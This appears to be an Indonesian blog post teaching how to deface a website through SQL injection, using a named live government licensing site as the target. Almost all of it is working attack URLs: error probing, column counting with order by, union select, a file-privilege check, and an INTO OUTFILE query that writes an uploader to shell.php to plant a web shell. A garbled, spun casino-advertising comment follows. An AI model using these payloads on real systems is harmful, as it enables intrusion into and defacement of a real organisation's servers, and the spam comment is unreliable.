Assalamualaikum
Hello gengs
Kembali lagi bersama saya hasby
Kali ini saya akan sharing cara deface poc sqli into outfile ,tanpa berlama2 kita lgsng praktek aja
Bahan? Uploader (yang sudah di hex decode)
Live target? http://dpmptsp-perizinan.buolkab.go.id/
ok pertama2 kita cari param nya dlu
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9
Kita kasih (') di samping param nya
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9'
Muncul "Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\dpmptsp-kabupaten.buol\website\berita_selengkapnya.php on line 8"
Kita balancing dlu
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9'--+-
Tampak kembali seperti tampilan pertama ,itu menandakan vuln
Lanjut kita order
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+10--+- ~> eror
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+9--+- ~> eror
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+8--+- ~> eror
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=9%27+order+by+7--+- ~> kembali seperti semula
Berarti column nya ada 7 ,lanjut kita union select
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,3,4,5,6,7--+-
Boom ,keluar angka ajaib nya
Angka ajaib nya ada
7,2,3
Kita cek dlu file priv nya
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,file_priv,4,5,6,7+from+mysql.user--+- ~> kalo ada keluar hirup Y itu bisa eksekusi into outfile,langsung saja kita eksekusi
Kasih uploader di angka ajaib nya+directory nya
http://dpmptsp-perizinan.buolkab.go.id/menuberita.php?modul=berita&aksi=berita_selengkapnya&id=.9%27+union+select+1,2,uploader,4,5,6,7+INTO+OUTFILE+'C:/xampp/htdocs/dpmptsp-kabupaten.buol/website/shell.php'--+-
boom ,kok eror? ,Eror bukan berarti gagal ,kita coba akses uploader kita , namaweb.go.id/namashell.php
Sebagai contoh ~> http://dpmptsp-perizinan.buolkab.go.id/website/shell.php
Boom itu bisa upshell
Selamat mencoba
masuk penjara enggak bang klo udh berhasil ke depes(‘◉⌓◉’)
BalasHapusWe appeared for on-line casinos would possibly be} straightforward to navigate on a smartphone or pill, have a neat consumer interface and a modern 카지노사이트 design, and feature bug-free, fast-loading video games. Super Slots is a relatively new casino, being launched in 2020. Super Slots has established itself as one of the top on-line casinos for slots within brief time|a short while}. Nearly each on-line casino presents more than one kind of slot game.
BalasHapus